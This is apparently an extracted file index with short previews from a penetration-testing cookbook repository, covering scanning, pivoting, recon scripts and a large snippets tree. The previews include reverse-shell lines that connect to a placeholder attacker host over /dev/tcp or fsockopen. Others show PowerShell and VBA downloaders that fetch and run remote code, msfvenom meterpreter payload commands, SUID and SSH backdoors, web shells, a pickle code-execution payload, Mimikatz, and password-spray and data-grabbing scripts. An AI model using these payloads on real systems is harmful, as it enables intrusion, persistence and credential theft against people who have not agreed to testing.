"preview": "`` Scanning\n\n ~$ nmap --script x11-access -p6000-6025 -n -v -Pn VAR_TARGET_HOST\n\n`` Information Gathering\n\n ~$ xwi"
},
{
"path": "Target.Network.Pivoting.txt",
"chars": 8709,
"preview": "`` Tunneling\n\n `` sshuttle\n\n ~$ sshuttle -r VAR_USERNAME@VAR_TARGET_HOST VAR_TARGET_CIDR\n\n `` ssf\n\n "
},
{
"path": "Target.Network.Scanning.txt",
"chars": 6717,
"preview": "`` Host discovery\n\n `` ARP\n\n ~$ arp -a\n ~$ arp-scan VAR_TARGET_CIDR -I eth0\n ~$ fping -ar\n\n `"
},
{
"path": "Target.Network.Wireless.txt",
"chars": 5923,
"preview": "`` Important notes\n\n - Remove `firmware-realtek` and use dkms\n - Use `pentesting-bootsrap/bootstrap.rtl88**au.sh` "
},
{
"path": "Target.Recon.DNS.txt",
"chars": 1471,
"preview": "`` DNS\n\n `` CNAME hijacking\n\n @ bin/dns_cnames.sh\n\n\n `` Zone transfer\n\n ~$ dig @ns.VAR_TARGET_DOMAIN"
},
{
"path": "Target.Recon.Dorks.txt",
"chars": 2143,
"preview": "`` Google\n\n `` Notes\n\n For more narrow search replace \"VAR_ORGANIZATION_STRING\" with site:VAR_TARGET_HOST\n\n "
},
{
"path": "Target.Recon.OSINT.txt",
"chars": 180,
"preview": "`` OSINT\n\n `` Automated\n\n ~$ theharvester -d VAR_TARGET_DOMAIN -l 250 -b google,baidu,yahoo,bing,pgp\n ~"
},
{
"path": "bin/direnum_combo.sh",
"chars": 1509,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 http://example.com\"\n exit 1\nfi\n\nshopt -s extglob\nTARGET=${1%%+("
},
{
"path": "bin/dns_cnames.sh",
"chars": 248,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 domains.txt\"\n exit 1\nfi\n\nfor domain in $(cat \"$1\"); do\n resu"
},
{
"path": "bin/dns_resolve.sh",
"chars": 293,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 hosts.txt\"\n exit 1\nfi\n\nfilter='has no|not found'\n\nfor domain in"
},
{
"path": "bin/dns_transfer.sh",
"chars": 181,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 example.com\"\n exit 1\nfi\n\nfor ns in $(dig +noall +answer $1 -t n"
},
{
"path": "bin/download_files.sh",
"chars": 199,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 urls.txt\"\n exit 1\nfi\n\nfor url in $(cat \"$1\"); do\n echo \"Requ"
},
{
"path": "bin/download_int.sh",
"chars": 228,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 http://example.com/asset- <FIRST_INT> <LAST_INT>\"\n exit 1\nfi\n\nf"
},
{
"path": "bin/ftp_server.py",
"chars": 1323,
"preview": "#!/usr/bin/env python3\n\nimport argparse\n\nfrom pyftpdlib.authorizers import DummyAuthorizer\nfrom pyftpdlib.handlers impor"
},
{
"path": "bin/hexdecode.py",
"chars": 430,
"preview": "#!/usr/bin/env python3\n\nimport argparse\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='"
},
{
"path": "bin/hexreverse.py",
"chars": 415,
"preview": "#!/usr/bin/env python3\n\nimport argparse\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='"
},
{
"path": "bin/http_codes.sh",
"chars": 184,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 urls.txt\"\n exit 1\nfi\n\nfor url in $(cat \"$1\"); do\n echo $url "
},
{
"path": "bin/httpd.py",
"chars": 4189,
"preview": "#!/usr/bin/env python3\n\nimport argparse\nimport cgi\nimport logging\nimport pathlib\nimport socket\nimport ssl\nfrom datetime "
},
{
"path": "bin/mac_oui.sh",
"chars": 208,
"preview": "#!/bin/bash\n\nmac=\"$(echo $1 | sed 's/ //g' | sed 's/-//g' | sed 's/://g' | cut -c1-6)\"\n\nresult=\"$(grep -i -A 4 ^$mac ~/l"
},
{
"path": "bin/mitm_toolkit.py",
"chars": 2610,
"preview": "import os\n\nimport mitmproxy as mitm\n\n\nclass ToolkitBase:\n\n def __init__(self):\n self.current_lab_ip = os.envir"
},
{
"path": "bin/parse_gnmap.sh",
"chars": 1096,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage:\"\n echo -e \"$0 results.gnmap output_filename\"\n exit 1\nfi\n\nif [[ "
},
{
"path": "bin/ping.py",
"chars": 1394,
"preview": "#!/usr/bin/env python3\n\nimport asyncio\nimport concurrent.futures\nimport random\n\nimport click\nimport netaddr\nfrom scapy i"
},
{
"path": "bin/ping.sh",
"chars": 350,
"preview": "#!/bin/bash\n\ntrap \"exit\" INT\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 192.168.1.0/24\"\n exit 1\nfi\n\nRED='\\033[0;31m'\nG"
},
{
"path": "bin/quote.py",
"chars": 289,
"preview": "#!/usr/bin/env python3\n\nimport argparse\nimport urllib\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser"
},
{
"path": "bin/scan_top.sh",
"chars": 2428,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage:\"\n echo -e \"- with host discovery, target as CIDR (network as outpu"
},
{
"path": "bin/snmp_enum.sh",
"chars": 357,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 192.168.1.0/24\"\n exit 1\nfi\n\nfor ip in $(prips $1); do\n echo "
},
{
"path": "bin/snmp_public_hosts.sh",
"chars": 144,
"preview": "#!/bin/bash\n\nif [[ -z $1 ]]; then\n echo \"Usage: $0 hosts.txt\"\n exit 1\nfi\n\nfor host in $(cat \"$1\"); do\n snmp-che"
},
{
"path": "bin/ssh_enum_malform.py",
"chars": 8661,
"preview": "#!/usr/bin/env python3\n###########################################################################\n# ____"
},
{
"path": "bin/ssh_enum_time.py",
"chars": 6487,
"preview": "#!/usr/bin/env python3\n#\n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)\n#\n# Author: 0_o -"
},
{
"path": "bin/tomcat_brute.py",
"chars": 2678,
"preview": "#!/usr/bin/env python3\n\nimport argparse\nimport requests\n\n\nPASSWD = [\n ('tomcat', ''),\n ('admin', ''),\n ('admin'"
},
{
"path": "bin/vba_format.py",
"chars": 657,
"preview": "#!/usr/bin/env python3\n\nimport click\n\n\ndef vb_wrap(val):\n return f'& \"{val}\" _'\n\n\n@click.command()\n@click.option('--b"
},
{
"path": "bin/vbe_decoder.py",
"chars": 6007,
"preview": "#!/usr/bin/env python3\n\n__description__ = 'Decode an encoded VBScript, often seen as a .vbe file'\n__author__ = 'John Ham"
},
{
"path": "bin/xor.py",
"chars": 2086,
"preview": "#!/usr/bin/env python3\n\nimport click\nimport sys\n\n\nclass Convert:\n\n pass\n\n\nclass XOR(Convert):\n\n def __init__(self,"
},
{
"path": "snippets/html/smuggling.html",
"chars": 1225,
"preview": "<html>\n <body>\n <script>\n function base64ToArrayBuffer(base64) {\n var binary_string "
},
{
"path": "snippets/java/shells/reverse/reverse.jsp",
"chars": 1974,
"preview": "<%-- Ex. http://192.168.1.1:8080/test.jsp?ip=192.168.1.100&port=8080&shell=/bin/bash --%>\n<%@\npage import=\"java.lang.*, "
},
{
"path": "snippets/java/shells/reverse/reverse_bash.java",
"chars": 190,
"preview": "String[] cmd = {\n \"/bin/bash\",\n \"-c\",\n \"exec 5<>/dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT;cat <&5 | while re"
},
{
"path": "snippets/java/shells/reverse/reverse_php.java",
"chars": 284,
"preview": "String[] cmd = {\n \"/bin/sh\",\n \"-c\",\n \"/bin/echo '<?php $sock=fsockopen(\\\"VAR_ATTACKER_HOST\\\", VAR_ATTACKER_PORT"
},
{
"path": "snippets/java/shells/web/webshell.jsp",
"chars": 1087,
"preview": "<!DOCTYPE html>\n<html>\n<head>\n <title></title>\n</head>\n<body>\n <form method=\"GET\" action=\"webshell.jsp\">\n <inpu"
},
{
"path": "snippets/java/utils/jenkins_console.groovy",
"chars": 185,
"preview": "def sout = new StringBuffer(), serr = new StringBuffer()\ndef proc = 'VAR_STRING'.execute()\nproc.consumeProcessOutput(sou"
},
{
"path": "snippets/linux/backdoors/ssh_reconnect.sh",
"chars": 220,
"preview": "#!/bin/sh\n\nif ps -ef | grep -v grep | grep VAR_ATTACKER_HOST ; then\n exit 0\nelse\n sshpass -p 'VAR_PASSWORD' ssh -f"
},
{
"path": "snippets/linux/backdoors/suid_popen.c",
"chars": 369,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <grp.h>\n\nint main(void)\n{\n FI"
},
{
"path": "snippets/linux/backdoors/suid_shell.c",
"chars": 286,
"preview": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <grp.h>\n\nint main(void)\n{\n se"
},
{
"path": "snippets/linux/maldocs/runner-1.c",
"chars": 518,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n\n// msfvenom -p linux/x64/meterpreter/reverse_tcp -e x64/zutto_dekiru lhost=VAR_A"
},
{
"path": "snippets/linux/shells/bind/udp.sh",
"chars": 525,
"preview": "#!/bin/sh\npython - <<EOF &\nlock = \"/tmp/ssh-o1Lonxx7lmaa\"\nimport os\nimport socket\nif os.path.isfile(lock):\n exit()\nfi"
},
{
"path": "snippets/linux/shells/reverse/reverse.c",
"chars": 587,
"preview": "#include <stdio.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <"
},
{
"path": "snippets/linux/shells/reverse/reverse.pl",
"chars": 3844,
"preview": "#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pent"
},
{
"path": "snippets/linux/utils/bruteforce.sh",
"chars": 551,
"preview": "#!/bin/bash\n\n# This is a small utility for parallel passwords bruteforcing using\n# some tricks in the GNU Linux/bash env"
},
{
"path": "snippets/linux/utils/ld_preload.c",
"chars": 215,
"preview": "/* gcc -fPIC -shared -o pe.so pe.c -nostartfiles */\n\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdlib.h>\n\nvoid"
},
{
"path": "snippets/linux/utils/persistence.py",
"chars": 6049,
"preview": "#!/usr/bin/env python\n\n# This is a stub for developing persistence over SSH, using base64-encoded\n# MySQL UDF (raptor), "
},
{
"path": "snippets/linux/utils/port_scanning1.sh",
"chars": 177,
"preview": "#!/bin/bash\n\nhost=$1\nport_first=1\nport_last=65535\n\nfor ((port=$port_first; port<=$port_last; port++))\ndo\n (echo >/dev/t"
},
{
"path": "snippets/linux/utils/ps_monitoring.sh",
"chars": 219,
"preview": "#!/bin/bash\n\nIFS=$'\\n'\n\nold_process=$(ps -eo command)\n\nwhile true; do\n new_process=$(ps -eo command)\n diff <(echo "
},
{
"path": "snippets/linux/utils/python_pickle.py",
"chars": 336,
"preview": "#!/usr/bin/env python\n\nimport pickle\nimport os\nimport base64\n\n\nclass Payload():\n\n def __reduce__(self):\n cmd ="
},
{
"path": "snippets/linux/utils/so_injection.c",
"chars": 244,
"preview": "/* gcc -shared -o expected_path.so -fPIC so_injection.c */\n\n#include <stdio.h>\n#include <stdlib.h>\n\nstatic void inject()"
},
{
"path": "snippets/php/recursive_dir.php",
"chars": 600,
"preview": "<?php\n\n// \"/Users/\" (macOS)\n// \"/home/\" (GNU/Linux)\n// \"C:\\Documents and Settings\\\" (Windows 2000/XP/2003)\n// \"C:\\Users\\"
},
{
"path": "snippets/python/port_scanning.py",
"chars": 406,
"preview": "#!/usr/bin/env python\n\nfrom socket import *\n\n\nif __name__ == '__main__':\n target = raw_input('Enter host to scan: ')\n"
},
{
"path": "snippets/windows/maldocs/downloader-1.cs",
"chars": 2345,
"preview": "using System;\nusing System.Threading.Tasks;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\n\n\n// msfveno"
},
{
"path": "snippets/windows/maldocs/downloader-1.js",
"chars": 651,
"preview": "var url = \"https://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT/test.doc\";\nvar req = WScript.CreateObject(\"MSXML2.ServerXMLHTTP\")"
},
{
"path": "snippets/windows/maldocs/downloader-1.ps1",
"chars": 311,
"preview": "IEX (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/Invoke-ReflectivePEInjection.ps1')\n$bytes"
},
{
"path": "snippets/windows/maldocs/downloader-1.vba",
"chars": 538,
"preview": "Sub Document_Open()\n Init\nEnd Sub\n\nSub AutoOpen()\n Init\nEnd Sub\n\nSub Init()\n Dim str As String\n Dim shellBin"
},
{
"path": "snippets/windows/maldocs/downloader-1.vbs",
"chars": 303,
"preview": "' msfvenom -p windows/x64/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=443 -f psh-reflection > test.doc\n\nSet Shell = "
},
{
"path": "snippets/windows/maldocs/downloader-1.xls",
"chars": 59,
"preview": "=msexcel|'..\\..\\..\\Windows\\system32\\cmd.exe /c calc.exe'!A0"
},
{
"path": "snippets/windows/maldocs/downloader-2.js",
"chars": 295,
"preview": "<!-- echo GetObject(\"script:http://VAR_ATTACKER_HOST/1.js\") > 1.js && wscript.exe 1.js -->\n<?xml version=\"1.0\"?>\n<packag"
},
{
"path": "snippets/windows/maldocs/downloader-2.vba",
"chars": 278,
"preview": "Sub MyMacro()\n Dim str As String\n str = \"powershell (New-Object System.Net.WebClient).DownloadString('http://VAR_A"
},
{
"path": "snippets/windows/maldocs/evasion-1.cs",
"chars": 557,
"preview": "using System;\nusing System.Management.Automation;\nusing System.Configuration.Install;\nusing System.Diagnostics;\n\n\nnamesp"
},
{
"path": "snippets/windows/maldocs/evasion-1.hta",
"chars": 241,
"preview": "<html>\n <head>\n <script>\n a = new ActiveXObject(\"WScript.Shell\");\n a.run('%windir%\\\\Syst"
},
{
"path": "snippets/windows/maldocs/evasion-1.inf",
"chars": 324,
"preview": ";cmstp.exe /s cmstp.inf\n\n[version]\nSignature=$chicago$\nAdvancedINF=2.5\n\n[DefaultInstall_SingleUser]\nUnRegisterOCXs=UnReg"
},
{
"path": "snippets/windows/maldocs/evasion-1.sct",
"chars": 1181,
"preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n<registration\n description=\"Bandit\"\n progid=\"Bandit\"\n version=\"1.00\"\n clas"
},
{
"path": "snippets/windows/maldocs/evasion-1.url",
"chars": 60,
"preview": "[InternetShortcut]\nURL=file:///c:\\windows\\system32\\calc.exe\n"
},
{
"path": "snippets/windows/maldocs/evasion-1.wsf",
"chars": 301,
"preview": "<?xml version=\"1.0\"?>\n<job id=\"Mixed\">\n <script language=\"VBScript\">\n' <![CDATA[\n WScript.echo \"Tes"
},
{
"path": "snippets/windows/maldocs/evasion-2.hta",
"chars": 338,
"preview": "<html>\n<head>\n<meta http-equiv=\"x-ua-compatible\" content=\"ie=9\">\n<title></title>\n<script language=\"VBScript\">\n Set ob"
},
{
"path": "snippets/windows/maldocs/evasion-2.inf",
"chars": 403,
"preview": "; DRIVER.INF\n; Copyright (c) Microsoft Corporation. All rights reserved.\n\n[Version]\nSignature = \"$CHICAGO$\"\nClass=61883"
},
{
"path": "snippets/windows/maldocs/evasion-2.sct",
"chars": 578,
"preview": "<?XML version=\"1.0\"?>\n<scriptlet>\n\n<registration\n description=\"Bandit\"\n progid=\"Bandit\"\n version=\"1.00\"\n cla"
},
{
"path": "snippets/windows/maldocs/evasion-msxml.xml",
"chars": 455,
"preview": "<?xml version='1.0'?>\n<stylesheet\nxmlns=\"http://www.w3.org/1999/XSL/Transform\" xmlns:ms=\"urn:schemas-microsoft-com:xslt\""
},
{
"path": "snippets/windows/maldocs/evasion-msxml.xsl",
"chars": 456,
"preview": "<?xml version='1.0'?>\n<!-- msxsl.exe poc.xml poc.xml -->\n<stylesheet\nxmlns=\"http://www.w3.org/1999/XSL/Transform\" xmlns:"
},
{
"path": "snippets/windows/maldocs/ntlm-1.url",
"chars": 81,
"preview": "[InternetShortcut]\nURL=https://10.0.0.1\nIconIndex=0\nIconFile=\\\\10.0.0.1\\test.ico\n"
},
{
"path": "snippets/windows/maldocs/ntlm-evasion-mssql-1.csproj",
"chars": 2911,
"preview": "<!-- C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\msbuild.exe ntlm-evasion-mssql-1.csproj -->\n\n<Project ToolsVersion=\"4"
},
{
"path": "snippets/windows/maldocs/runner-1.cs",
"chars": 1270,
"preview": "using System;\nusing System.Threading.Tasks;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\n\n\n// msfveno"
},
{
"path": "snippets/windows/maldocs/runner-1.ps1",
"chars": 1078,
"preview": "# msfvenom -p windows/meterpreter/reverse_https lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT exitfunc=thread -f ps1\n\n"
},
{
"path": "snippets/windows/maldocs/runner-1.vba",
"chars": 1268,
"preview": "' msfvenom -p windows/meterpreter/reverse_https lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT exitfunc=thread -f vbapp"
},
{
"path": "snippets/windows/shells/bind/PortListener.ps1",
"chars": 548,
"preview": "$endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, VAR_TARGET_PORT)\n$listener = New-Object System"
},
{
"path": "snippets/windows/shells/bind/web1.asp",
"chars": 633,
"preview": "<%\nFunction RunCmd(command)\n Dim res as integer\n Dim myProcess As New Process()\n Dim myProcessStartInfo As New ProcessSt"
},
{
"path": "snippets/windows/shells/bind/web2.asp",
"chars": 956,
"preview": "<%\nServer.ScriptTimeout = 180\n\nip=request.ServerVariables(\"REMOTE_ADDR\")\nif ip <> \"VAR_ATTACKER_HOST\" then\n response.Sta"
},
{
"path": "snippets/windows/shells/bind/web3.asp",
"chars": 1526,
"preview": "<%@ Language=VBScript %>\n<%\n ' --------------------o0o--------------------\n ' File: CmdAsp.asp\n ' Author: Maceo"
},
{
"path": "snippets/windows/shells/bind/web4.aspx",
"chars": 1318,
"preview": "<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<%@ Import Namespace=\"System.Diagnostics\" %>\n<%@ Import Namespace=\""
},
{
"path": "snippets/windows/shells/reverse/reverse1.bat",
"chars": 2035,
"preview": "echo #include ^<winsock2.h^> >> shell.c\r\necho #include ^<stdio.h^> >> shell.c\r\necho #pragma comment(lib, \"w2_32\") >> she"
},
{
"path": "snippets/windows/shells/reverse/reverse1.cpp",
"chars": 2782,
"preview": "// Source: https://raw.githubusercontent.com/paranoidninja/ScriptDotSh-MalwareDevelopment/master/prometheus.cpp\n// Compi"
},
{
"path": "snippets/windows/shells/reverse/reverse1.cs",
"chars": 2259,
"preview": "using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Li"
},
{
"path": "snippets/windows/shells/reverse/reverse1.ps1",
"chars": 1677,
"preview": "function cleanup {\nif ($client.Connected -eq $true) {$client.Close()}\nif ($process.ExitCode -ne $null) {$process.Close()"
},
{
"path": "snippets/windows/shells/reverse/reverse2.cpp",
"chars": 3004,
"preview": "// Modified\n// Original: https://raw.githubusercontent.com/paranoidninja/ScriptDotSh-MalwareDevelopment/master/prometheu"
},
{
"path": "snippets/windows/shells/reverse/reverse2.ps1",
"chars": 515,
"preview": "$client = New-Object System.Net.Sockets.TCPClient(\"VAR_TARGET_HOST\",VAR_TARGET_PORT);$stream = $client.GetStream();[byte"
},
{
"path": "snippets/windows/shells/reverse/reverse_dll.c",
"chars": 1322,
"preview": "// gcc -shared -lws2_32 -o dll_rev_shell.dll dll_rev_shell.c\n// rundll32 rev.dll,main\n//#include \"pch.h\"\n#include \"stdli"
},
{
"path": "snippets/windows/utils/DomainPasswordSpray.ps1",
"chars": 19105,
"preview": "function Invoke-DomainPasswordSpray{\n <#\n .SYNOPSIS\n\n This module performs a password spray attack against user"
},
{
"path": "snippets/windows/utils/Enable-Privilege.ps1",
"chars": 1794,
"preview": "function Enable-Privilege {\n\n param(\n $Privilege,\n $ProcessId = $pid,\n [Switch] $Disable\n )\n "
},
{
"path": "snippets/windows/utils/GrabAndRun.ps1",
"chars": 2168,
"preview": "# ░▒▓ GrabAndRun.ps1 ▓▒░\n#\n# Takes screenshot, grabs some local information, encrypts using X.509 public key and sends e"
},
{
"path": "snippets/windows/utils/Invoke-Mimikatz-latest.ps1",
"chars": 2685594,
"preview": "function Invoke-Mimikatz\n{\n<#\n.SYNOPSIS\n\nThis script leverages Mimikatz 2.1.1 and Invoke-ReflectivePEInjection to reflec"
},
{
"path": "snippets/windows/utils/PortScanning.ps1",
"chars": 361,
"preview": "$ErrorActionPreference = \"SilentlyContinue\"\n$ports = 1..65535\n$ip = \"VAR_TARGET_HOST\"\n\nforeach ($port in $ports) {\n i"
},
{
"path": "snippets/windows/utils/Self-Elevate.ps1",
"chars": 473,
"preview": "if (-Not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.P"
},
{
"path": "snippets/windows/utils/SharingIsCaring.ps1",
"chars": 4079,
"preview": "# ░▒▓ SharingIsCaring.ps1 ▓▒░\n#\n# Massive SMB shares downloader used to test for data exposure in local networks\n#\n# Exa"
},
{
"path": "snippets/windows/utils/Start-WebServer.ps1",
"chars": 31412,
"preview": "<#\n.Synopsis\nStarts powershell webserver\n.Description\nStarts webserver as powershell process.\nCall of the root page (e.g"
},
{
"path": "snippets/windows/utils/SuperPing.ps1",
"chars": 1435,
"preview": "# Author: Merakel\n\n$ping =\n \"server1\",\n \"server2\",\n \"server3\"\n\nFunction Super-Ping{\n Param([Parameter(ValueF"
},
{
"path": "snippets/windows/utils/Win10FirewallRules.ps1",
"chars": 626,
"preview": "Get-NetFirewallRule -Action Allow -Enabled True -Direction Inbound |\nFormat-Table -Property @{Name='DisplayName'; Expres"
},
{
"path": "snippets/windows/utils/WindowsEnum.ps1",
"chars": 7198,
"preview": "# Source https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1\r\n# Usage\r\n# run script directly "
},
{
"path": "snippets/windows/utils/base64.vbs",
"chars": 989,
"preview": "Function Base64Encode(inData)\n Const Base64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\n Dim "
},
{
"path": "snippets/windows/utils/ftp.bat",
"chars": 186,
"preview": "REM ftp -v -n -s:ftp.txt\r\n\r\necho open VAR_ATTACKER_HOST > ftp.txt\r\necho user anonymous >> ftp.txt\r\necho ftp >> ftp.txt\r\n"
},
{
"path": "snippets/windows/utils/icacls.bat",
"chars": 749,
"preview": "@echo off\nREM Source: https://raw.githubusercontent.com/ankh2054/windows-pentest/master/icacls.bat\nREM Description: Scri"
},
{
"path": "snippets/windows/utils/info.aspx",
"chars": 44280,
"preview": "<%--\n Source: https://gist.githubusercontent.com/mrichman/fc097266e57ba64c43d24ad3bdf6d5e8/raw/ad40dffa08111d8cb5ecef"
},
{
"path": "snippets/windows/utils/mimikatz-Invoke-Mimikatz-obfuscate.sh",
"chars": 951,
"preview": "#!/bin/bash\n\n# Original: https://gist.githubusercontent.com/infosecn1nja/bb0771adb879f1690a0dd8dfa0fc728b/raw/70d45ad3ac"
},
{
"path": "snippets/windows/utils/mimikatz-clone-obfuscated.sh",
"chars": 1827,
"preview": "#!/bin/bash\n\n# Original: https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/\n\nif [[ -z $1 ]]; then\n e"
},
{
"path": "snippets/windows/utils/minidump.cs",
"chars": 1128,
"preview": "using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices; using System.IO;\n\nnamespace MiniDump {\n\n "
},
{
"path": "snippets/windows/utils/run_bat.c",
"chars": 159,
"preview": "// x86_64-w64-mingw32-gcc run_bat.c -o mssvc.exe\n\n#include <stdlib.h>\n\nint main ()\n{\n int i;\n i = system(\"cmd /c C"
},
{
"path": "snippets/windows/utils/run_dll1.c",
"chars": 323,
"preview": "// Minimalistic approach\n// x86_64-w64-mingw32-gcc run_dll1.c -o lib.dll -shared\n\n#include <windows.h>\n\nBOOL WINAPI DllM"
},
{
"path": "snippets/windows/utils/run_dll2.cpp",
"chars": 1449,
"preview": "// x86_64-w64-mingw32-g++ run_dll2.cpp -o lib.dll -shared\r\n// get.bat: %COMSPEC% /c whoami > C:\\Python27\\whoami.txt\r\n\r\n#"
},
{
"path": "snippets/windows/utils/runas1.bat",
"chars": 369,
"preview": "REM powershell -ExecutionPolicy Bypass -File runas.ps1\n\necho $username = 'VAR_USERNAME' > runas.ps1\necho $securePassword"
},
{
"path": "snippets/windows/utils/runas2.bat",
"chars": 406,
"preview": "REM powershell -ExecutionPolicy Bypass -File script.ps1\r\n\r\necho $pp = new-object -typename System.Management.Automation."
},
{
"path": "snippets/windows/utils/schcheck.bat",
"chars": 548,
"preview": "@echo off\nREM Source: https://raw.githubusercontent.com/ankh2054/windows-pentest/master/schcheck.bat\nREM - Lists all sch"
},
{
"path": "snippets/windows/utils/tcpwrecovery.py",
"chars": 3604,
"preview": "\"\"\"\nCopyright (C) <2013> <Csaba Fitzl>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of "
},
{
"path": "snippets/windows/utils/update_invoke_mimikatz.py",
"chars": 1006,
"preview": "#!/usr/bin/python3\n\n# Source: https://raw.githubusercontent.com/gg-sec/update_invoke_mimikatz/30c459843e1cc7b4b218317f92"
},
{
"path": "snippets/windows/utils/useradd.c",
"chars": 227,
"preview": "// x86_64-w64-mingw32-gcc useradd.c -o LocalUpdate.exe\n\n#include <stdlib.h>\n\nint main ()\n{\n int i;\n i = system(\"ne"
},
{
"path": "snippets/windows/utils/wget_ps1.bat",
"chars": 345,
"preview": "REM powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1\r\n\r\necho $storageDir = $pwd "
},
{
"path": "snippets/windows/utils/wget_vbs.bat",
"chars": 1418,
"preview": "REM cscript wget.vbs http://VAR_ATTACKER_HOST/file.exe file.exe\n\necho strUrl = WScript.Arguments.Item(0) > wget.vbs\necho"
},
{
"path": "snippets/windows/utils/winscppassword.py",
"chars": 3575,
"preview": "# coding=utf-8\n\n# Source: https://github.com/dzxs/winscppassword\n\ntry:\n import _winreg\nexcept:\n import winreg as _"
},
{
"path": "snippets/xml/xee.txt",
"chars": 3234,
"preview": "-- Source: https://gist.githubusercontent.com/staaldraad/01415b990939494879b4/raw/25cff41582552aee47b06526d568f5785af67d"
}
]
About this extraction
This page contains the full source code of the tasooshi/pentesting-cookbook GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 151 files (3.0 MB), approximately 793.2k tokens, and a symbol index with 114 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.